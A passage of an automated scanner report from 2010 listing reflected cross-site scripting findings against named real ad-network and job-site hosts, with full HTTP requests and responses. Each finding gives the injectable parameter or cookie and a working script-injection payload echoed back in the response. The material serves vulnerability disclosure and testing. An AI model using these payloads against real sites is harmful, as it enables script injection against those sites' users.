<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<title>
...[SNIP]...
<a id="homeFootContactUs" href="http://www.bing.com/search?q=c2550"><script>alert(1)</script>754871af0ad+-quantcast" rel="nofollow">
...[SNIP]...

1.258. http://k.collective-media.net/cmadj/cm.ny_post/tier2_082410 [cli cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://k.collective-media.net
Path:   /cmadj/cm.ny_post/tier2_082410

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2bbbe'%3balert(1)//5ecd75f6dc4 was submitted in the cli cookie. This input was echoed as 2bbbe';alert(1)//5ecd75f6dc4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/cm.ny_post/tier2_082410 HTTP/1.1
Host: k.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dal-dc; bkdp=1; blue=1; apnx=1; qcms=1; JY57=3kLv9HAF1oij2HK9QoO88ruPVtS-4jU-0EtAlYwrF4689JWJDCrmEww; cli=11bbcecf1d09b9d2bbbe'%3balert(1)//5ecd75f6dc4; nadp=1; mmpg=1; targ=1; gce=1; qcdp=1;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 7087
Date: Fri, 26 Nov 2010 20:41:26 GMT
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-70956833_1290804086","http://ad.doubleclick.net//cm.ny_post/tier2_082410;net=cm;u=,cm-70956833_1290804086,11bbcecf1d09b9d2bbbe';alert(1)//5ecd75f6dc4,none,;;contx=none;dc=d;btg=?","0","0",true);</scr'+'ipt>
...[SNIP]...

1.259. http://tag.admeld.com/ad/iframe/14/nypost/728x90/above-fold [meld_sess cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/14/nypost/728x90/above-fold

Issue detail

The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c605"><script>alert(1)</script>892b148ceb1 was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/iframe/14/nypost/728x90/above-fold?t=1290805811208&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.nypost.com%2Feedition%2F&refer= HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/eedition/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=5a738589-032a-45ab-a7ad-eba47ded68466c605"><script>alert(1)</script>892b148ceb1; D41U=3vrvQaMHmkXr8dbcHThZwml2V9ztwWznqrd2Lpms5UprRgsYB__drgQ; ebNewBandWidth_.tag.admeld.com=7019%3A1290805809882

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: eyB0eXBlOiAgICAgICAgICJtZWxkIiwgIHB1YjogICAgICAgICAgMTQsICBzaXRlOiAgICAgICAgICJueXBvc3QiLCAgYWQ6ICAgICAgICAgICAzMjE0LCAgbmV0d29yazogICAgICAiYWRicml0ZSIsICBzaXplOiAgICAgICAgICI3Mjh4OTAiLCAgZnJlcTogICAgICAgICAiMS05IiwgIGRlZmF1bHRzOiAgICAgIjAtMCIsICByZXF1ZXN0OiAgICAgICI2MjgzMTBkNy01YmNmLTRkZTEtODBhYy04ZmFlMDhiYzY2NjciLCAgdXNlcjogICAgICAgICAiNWE3Mzg1ODktMDMyYS00NWFiLWE3YWQtZWJhNDdkZWQ2ODQ2NmM2MDUiPjxzY3JpcHQ+YWxlcnQoMSk8L3NjcmlwdD44OTJiMTQ4Y2ViMSIsICBjb3VudHJ5OiAgICAgICJVUyIsICBjaXR5OiAgICAgICAgICJIb3VzdG9uIiwgIGRtYTogICAgICAgICAgNjE4LCAgcmVnaW9uOiAgICAgICAiVFgiLCAgaXA6ICAgICAgICAgICAiMTc0LjEyMi4yMy4yMTgiLCAgZGVwdGg6ICAgICAgICAxLCAgdGFyZ2V0OiAgICAgICAiYWJvdmUtZm9sZCIsICBkaXY6ICAgICAgICAgICI2MjgzMTBkNy01YmNmLTRkZTEtODBhYy04ZmFlMDhiYzY2NjciLCAgdXJsOiAgICAgICAgICAiaHR0cDovL3d3dy5ueXBvc3QuY29tL2VlZGl0aW9uLyIsICBlbGFwc2VkOiAgICAgIDAsICBkZWNpc2lvbjogICAgICJhZCIsICBpbXA6ICAgICAgICAgIDEsICBuZXR3b3JrX2lkOiAgIDE5LCAgYWNjb3VudF9pZDogICA0NDgsICBuZXR3b3JrX25hbWU6ICJBZEJyaXRlIiwgIHB1Ymxpc2hlcl9uYW1lOiAibnlwb3N0IiwgIGVjcG06ICAgICAgICAgIjEuMTYiLCAgZmVjcG06ICAgICAgICAiMS4xNiIsICBmaWxsOiAgICAgICAgICI3MC42OCIsICBwbGFjZW1lbnQ6ICAgICJhYm92ZS1mb2xkIiwgIHJ1bGU6ICAgICAgICAgImFib3ZlLWZvbGQiLCAgY3JlYXRpdmVfaWQ6ICAiIiwgIGJpZGRlcnM6ICAgICAgW10sICB0YXJnZXRpbmc6ICAgICIiLCAgaG9zdDogICAgICAgICAibmotdGFnNiJ9
Content-Length: 1995
Content-Type: text/html
Date: Fri, 26 Nov 2010 20:21:37 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0; padding:0">


<div style="width:728px,height:90px;margin:0;border:0">



...[SNIP]...
<script type="text/javascript" src="http://load.exelator.com/load/?p=104&g=060&admeld_user_id=5a738589-032a-45ab-a7ad-eba47ded68466c605"><script>alert(1)</script>892b148ceb1&admeld_dataprovider_id=3&admeld_callback=http://tag.admeld.com/pixel">
...[SNIP]...

1.260. http://www.indeed.com/pagead/clk [atk parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.indeed.com
Path:   /pagead/clk

Issue detail

The value of the atk request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28d59"><script>alert(1)</script>7fe02f4e4cf was submitted in the atk parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /pagead/clk?mo=r&ad=-6NYlbfkN0CxqcpVj1EFcAZWHx6smIldmHpp1G5t2J5E0v9EvyT8lYDAx0LXbRPZ4BrQYzAZDHfJdi_CG3WO8ddZ6qQLmnIvJ9G-n0UwqaqJIrZLhFyGEyuImTlq9xGSKVGl6tBY7SsbOKgz9flGm3Zh11DHkLhQyr4MSQC57_aaYN3OgED_JuaaLIeiLrkyPZL5b9vA5UOhDZzUe4Zn-N2XsWlhmsI6FXvYcAHxWTgHZwDBjNCbqkVJYJELD3zu8inn1zC4MqXHWzfAVLAbYYX7t5JAyCAiKYXs7T9pPgGOoGpP7LvP6NQf6qW4ZvnI4QNKSKAnyZ80sXPFxCuNUjAS05yQUwLJiKme4p3af8Um8AYMYpVDU3h1uxJhP8pFEceJMn3HO2Dt4BsXVwEVdqkhUuMM6z9cx8e5D2Gc2xmvjnHX2e7AnuN_jRNEw375&p=1&atk=15i4tbk100g3g34v28d59"><script>alert(1)</script>7fe02f4e4cf HTTP/1.1
Host: www.indeed.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DCT=4; JSESSIONID=A7159CBE6B1CF525312CB1BC96C2951C.usA_iad-web8; NSC_vt_jbe=ffffffffaec9d30745525d5f4f58455e445a4a423660; CTK=15i4tbl4c0k422n0;

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 26 Nov 2010 20:22:49 GMT
Server: Apache
Cache-Control: private
Location: http://us.conv.indeed.com/pagead/clk?mo=f&ad=-6NYlbfkN0CxqcpVj1EFcAZWHx6smIldmHpp1G5t2J5E0v9EvyT8lYDAx0LXbRPZ4BrQYzAZDHfJdi_CG3WO8ddZ6qQLmnIvJ9G-n0UwqaqJIrZLhFyGEyuImTlq9xGSKVGl6tBY7SsbOKgz9flGm3Zh11DHkLhQyr4MSQC57_aaYN3OgED_JuaaLIeiLrkyPZL5b9vA5UOhDZzUe4Zn-N2XsWlhmsI6FXvYcAHxWTgHZwDBjNCbqkVJYJELD3zu8inn1zC4MqXHWzfAVLAbYYX7t5JAyCAiKYXs7T9pPgGOoGpP7LvP6NQf6qW4ZvnI4QNKSKAnyZ80sXPFxCuNUjAS05yQUwLJiKme4p3af8Um8AYMYpVDU3h1uxJhP8pFEceJMn3HO2Dt4BsXVwEVdqkhUuMM6z9cx8e5D2Gc2xmvjnHX2e7AnuN_jRNEw375&p=1&atk=15i4tbk100g3g34v28d59"><script>alert(1)</script>7fe02f4e4cf&ctk=15i4tbl4c0k422n0&ctkRcv=1&pcid=&wuid=20ce44ad3585bc2f
Content-Length: 747
Vary: User-Agent,Accept-Encoding
Keep-Alive: timeout=30, max=29970
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Set-Cookie: NSC_vt_jbe=ffffffffaec9d30745525d5f4f58455e445a4a423660;expires=Fri, 26-Nov-2010 21:22:49 GMT;path=/;httponly

<HTML><HEAD><TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://us.conv.indeed.com/pagead/clk?mo=f&ad=-6NYlbfkN0CxqcpVj1EFcAZWHx6smIldmHpp1G5t2J5E0v9EvyT8lY
...[SNIP]...
VLAbYYX7t5JAyCAiKYXs7T9pPgGOoGpP7LvP6NQf6qW4ZvnI4QNKSKAnyZ80sXPFxCuNUjAS05yQUwLJiKme4p3af8Um8AYMYpVDU3h1uxJhP8pFEceJMn3HO2Dt4BsXVwEVdqkhUuMM6z9cx8e5D2Gc2xmvjnHX2e7AnuN_jRNEw375&p=1&atk=15i4tbk100g3g34v28d59"><script>alert(1)</script>7fe02f4e4cf&ctk=15i4tbl4c0k422n0&ctkRcv=1&pcid=&wuid=20ce44ad3585bc2f">
...[SNIP]...

1.261. http://www.indeed.com/pagead/clk [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.indeed.com
Path:   /pagead/clk

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa74e"><script>alert(1)</script>6c40311fe84 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /pagead/clk?mo=r&ad=-6NYlbfkN0CxqcpVj1EFcAZWHx6smIldmHpp1G5t2J5E0v9EvyT8lYDAx0LXbRPZ4BrQYzAZDHfJdi_CG3WO8ddZ6qQLmnIvJ9G-n0UwqaqJIrZLhFyGEyuImTlq9xGSKVGl6tBY7SsbOKgz9flGm3Zh11DHkLhQyr4MSQC57_aaYN3OgED_JuaaLIeiLrkyPZL5b9vA5UOhDZzUe4Zn-N2XsWlhmsI6FXvYcAHxWTgHZwDBjNCbqkVJYJELD3zu8inn1zC4MqXHWzfAVLAbYYX7t5JAyCAiKYXs7T9pPgGOoGpP7LvP6NQf6qW4ZvnI4QNKSKAnyZ80sXPFxCuNUjAS05yQUwLJiKme4p3af8Um8AYMYpVDU3h1uxJhP8pFEceJMn3HO2Dt4BsXVwEVdqkhUuMM6z9cx8e5D2Gc2xmvjnHX2e7AnuN_jRNEw375&p=1&atk=15i4tbk100g3g34v&fa74e"><script>alert(1)</script>6c40311fe84=1 HTTP/1.1
Host: www.indeed.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DCT=4; JSESSIONID=A7159CBE6B1CF525312CB1BC96C2951C.usA_iad-web8; NSC_vt_jbe=ffffffffaec9d30745525d5f4f58455e445a4a423660; CTK=15i4tbl4c0k422n0;

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 26 Nov 2010 20:22:49 GMT
Server: Apache
Cache-Control: private
Location: http://us.conv.indeed.com/pagead/clk?mo=f&ad=-6NYlbfkN0CxqcpVj1EFcAZWHx6smIldmHpp1G5t2J5E0v9EvyT8lYDAx0LXbRPZ4BrQYzAZDHfJdi_CG3WO8ddZ6qQLmnIvJ9G-n0UwqaqJIrZLhFyGEyuImTlq9xGSKVGl6tBY7SsbOKgz9flGm3Zh11DHkLhQyr4MSQC57_aaYN3OgED_JuaaLIeiLrkyPZL5b9vA5UOhDZzUe4Zn-N2XsWlhmsI6FXvYcAHxWTgHZwDBjNCbqkVJYJELD3zu8inn1zC4MqXHWzfAVLAbYYX7t5JAyCAiKYXs7T9pPgGOoGpP7LvP6NQf6qW4ZvnI4QNKSKAnyZ80sXPFxCuNUjAS05yQUwLJiKme4p3af8Um8AYMYpVDU3h1uxJhP8pFEceJMn3HO2Dt4BsXVwEVdqkhUuMM6z9cx8e5D2Gc2xmvjnHX2e7AnuN_jRNEw375&p=1&atk=15i4tbk100g3g34v&fa74e"><script>alert(1)</script>6c40311fe84=1&ctk=15i4tbl4c0k422n0&ctkRcv=1&pcid=&wuid=0b338f7b71c5834e
Content-Length: 750
Vary: User-Agent,Accept-Encoding
Keep-Alive: timeout=30, max=29970
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Set-Cookie: NSC_vt_jbe=ffffffffaec9d30745525d5f4f58455e445a4a423660;expires=Fri, 26-Nov-2010 21:22:49 GMT;path=/;httponly

<HTML><HEAD><TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://us.conv.indeed.com/pagead/clk?mo=f&ad=-6NYlbfkN0CxqcpVj1EFcAZWHx6smIldmHpp1G5t2J5E0v9EvyT8lY
...[SNIP]...
LAbYYX7t5JAyCAiKYXs7T9pPgGOoGpP7LvP6NQf6qW4ZvnI4QNKSKAnyZ80sXPFxCuNUjAS05yQUwLJiKme4p3af8Um8AYMYpVDU3h1uxJhP8pFEceJMn3HO2Dt4BsXVwEVdqkhUuMM6z9cx8e5D2Gc2xmvjnHX2e7AnuN_jRNEw375&p=1&atk=15i4tbk100g3g34v&fa74e"><script>alert(1)</script>6c40311fe84=1&ctk=15i4tbl4c0k422n0&ctkRcv=1&pcid=&wuid=0b338f7b71c5834e">
...[SNIP]...

1.262. http://www.indeed.com/pagead/clk [p parameter]  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.indeed.com
Path:   /pagead/clk

Issue detail

The value of the p request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cba72"><script>alert(1)</script>e92ccd37ea was submitted in the p parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /pagead/clk?mo=r&ad=-6NYlbfkN0CxqcpVj1EFcAZWHx6smIldmHpp1G5t2J5E0v9EvyT8lYDAx0LXbRPZ4BrQYzAZDHfJdi_CG3WO8ddZ6qQLmnIvJ9G-n0UwqaqJIrZLhFyGEyuImTlq9xGSKVGl6tBY7SsbOKgz9flGm3Zh11DHkLhQyr4MSQC57_aaYN3OgED_JuaaLIeiLrkyPZL5b9vA5UOhDZzUe4Zn-N2XsWlhmsI6FXvYcAHxWTgHZwDBjNCbqkVJYJELD3zu8inn1zC4MqXHWzfAVLAbYYX7t5JAyCAiKYXs7T9pPgGOoGpP7LvP6NQf6qW4ZvnI4QNKSKAnyZ80sXPFxCuNUjAS05yQUwLJiKme4p3af8Um8AYMYpVDU3h1uxJhP8pFEceJMn3HO2Dt4BsXVwEVdqkhUuMM6z9cx8e5D2Gc2xmvjnHX2e7AnuN_jRNEw375&p=1cba72"><script>alert(1)</script>e92ccd37ea&atk=15i4tbk100g3g34v HTTP/1.1
Host: www.indeed.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DCT=4; JSESSIONID=A7159CBE6B1CF525312CB1BC96C2951C.usA_iad-web8; NSC_vt_jbe=ffffffffaec9d30745525d5f4f58455e445a4a423660; CTK=15i4tbl4c0k422n0;

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 26 Nov 2010 20:22:48 GMT
Server: Apache
Cache-Control: private
Location: http://us.conv.indeed.com/pagead/clk?mo=f&ad=-6NYlbfkN0CxqcpVj1EFcAZWHx6smIldmHpp1G5t2J5E0v9EvyT8lYDAx0LXbRPZ4BrQYzAZDHfJdi_CG3WO8ddZ6qQLmnIvJ9G-n0UwqaqJIrZLhFyGEyuImTlq9xGSKVGl6tBY7SsbOKgz9flGm3Zh11DHkLhQyr4MSQC57_aaYN3OgED_JuaaLIeiLrkyPZL5b9vA5UOhDZzUe4Zn-N2XsWlhmsI6FXvYcAHxWTgHZwDBjNCbqkVJYJELD3zu8inn1zC4MqXHWzfAVLAbYYX7t5JAyCAiKYXs7T9pPgGOoGpP7LvP6NQf6qW4ZvnI4QNKSKAnyZ80sXPFxCuNUjAS05yQUwLJiKme4p3af8Um8AYMYpVDU3h1uxJhP8pFEceJMn3HO2Dt4BsXVwEVdqkhUuMM6z9cx8e5D2Gc2xmvjnHX2e7AnuN_jRNEw375&p=1cba72"><script>alert(1)</script>e92ccd37ea&atk=15i4tbk100g3g34v&ctk=15i4tbl4c0k422n0&ctkRcv=1&pcid=&wuid=b18ec44b6577a165
Content-Length: 746
Vary: User-Agent,Accept-Encoding
Keep-Alive: timeout=30, max=29976
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Set-Cookie: NSC_vt_jbe=ffffffffaec9d30745525d5f4f58455e445a4a423660;expires=Fri, 26-Nov-2010 21:22:48 GMT;path=/;httponly

<HTML><HEAD><TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://us.conv.indeed.com/pagead/clk?mo=f&ad=-6NYlbfkN0CxqcpVj1EFcAZWHx6smIldmHpp1G5t2J5E0v9EvyT8lY
...[SNIP]...
LD3zu8inn1zC4MqXHWzfAVLAbYYX7t5JAyCAiKYXs7T9pPgGOoGpP7LvP6NQf6qW4ZvnI4QNKSKAnyZ80sXPFxCuNUjAS05yQUwLJiKme4p3af8Um8AYMYpVDU3h1uxJhP8pFEceJMn3HO2Dt4BsXVwEVdqkhUuMM6z9cx8e5D2Gc2xmvjnHX2e7AnuN_jRNEw375&p=1cba72"><script>alert(1)</script>e92ccd37ea&atk=15i4tbk100g3g34v&ctk=15i4tbl4c0k422n0&ctkRcv=1&pcid=&wuid=b18ec44b6577a165">
...[SNIP]...

Report generated by XSS.CX at Fri Nov 26 15:36:11 CST 2010.